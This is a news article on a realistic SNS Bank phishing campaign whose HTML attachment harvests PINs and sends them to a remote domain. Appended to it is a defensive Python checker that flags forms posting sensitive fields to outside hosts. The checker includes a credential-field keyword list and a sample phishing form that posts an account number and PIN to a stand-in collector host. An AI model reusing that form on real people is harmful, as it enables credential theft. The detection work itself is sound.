Phishers use replication techniques that provide better results

Oct 7, 2011 13:36 GMT

Dutch financial institution SNS Bank is realistically impersonated in the latest spam campaign seen in the wild, which joins the club of phishing expeditions that rely on attachments to do their thing.

It's not the first time we have seen a legitimate website replicated in detail; recently, PayPal also seemed to be sending out emails that announced unsuccessful transactions.

Mxlabs shows us the message, which appears to come from the spoofed sender SNS Bank <[email protected]> and tells the unsuspecting victim that his bank account needs to be verified as soon as possible.

The attachment, called SNS_RekeningActiveren, opens a form in the user's browser that asks him to fill in a number of text fields with all sorts of sensitive information, including the PIN.

After the Submit button is hit, the data is sent to a Canadian domain, which is most likely controlled by the masterminds behind the operation.

As the content of the email and the form is entirely in Dutch, the spam campaign most likely targets people from the Netherlands, but this is a very good example of phishing attempts that are carefully designed to be taken seriously. In the images contained in the article you can clearly see the almost perfect resemblance.

Cybercriminals have noticed that emails written in a hurry, full of grammar errors and incorrect information, mostly fail, so they are turning to these more sophisticated attempts, which are developed over a longer period of time.

The conclusion we can draw from this is that even if a message looks highly legitimate, a bank still won't ask anyone for sensitive information over the phone or over the internet, especially when it comes to things like PINs and account numbers.

In these situations, the attachment might not be detected as malware by your anti-virus solution, so it will be up to your logical thinking to determine that the note isn't legitimate.
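Even when no malware signature fires, the pattern described above (a local form that submits sensitive fields to a remote server) can be checked statically at a mail gateway. The following is an added example, not code from the original article: it assumes the attachment is an HTML file, and the keyword list, field names and `collector.example` host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical keyword list for field names; tune per language and brand.
SENSITIVE_HINTS = ("pin", "pass", "wachtwoord", "rekening", "card", "cvv")


class FormAudit(HTMLParser):
    """Collects each <form> with its action URL and input field names."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms:
            self.forms[-1]["fields"].append(
                ((a.get("name") or "").lower(), (a.get("type") or "text").lower()))


def audit_attachment(html):
    """Return findings for forms that send sensitive fields to a remote host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        sensitive = [n for n, t in form["fields"]
                     if t == "password" or any(h in n for h in SENSITIVE_HINTS)]
        # A local attachment has no origin of its own, so an absolute
        # http(s) action means the data leaves for a third-party server.
        if url.scheme in ("http", "https") and sensitive:
            findings.append({"host": url.hostname, "fields": sensitive})
    return findings


# Constructed sample standing in for an HTML attachment (not the real one).
SAMPLE = """<html><body><form method="post" action="http://collector.example/save.php">
<input type="text" name="rekeningnummer"><input type="text" name="pincode">
<input type="submit" value="Verzenden"></form></body></html>"""

if __name__ == "__main__":
    for f in audit_attachment(SAMPLE):
        print("remote form post to", f["host"], "collecting", f["fields"])
```

Substring matching on field names will produce some false positives, so a finding is better used to quarantine or tag the message than to drop it outright.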

Images: the fake SNS Bank website; the genuine SNS Bank website.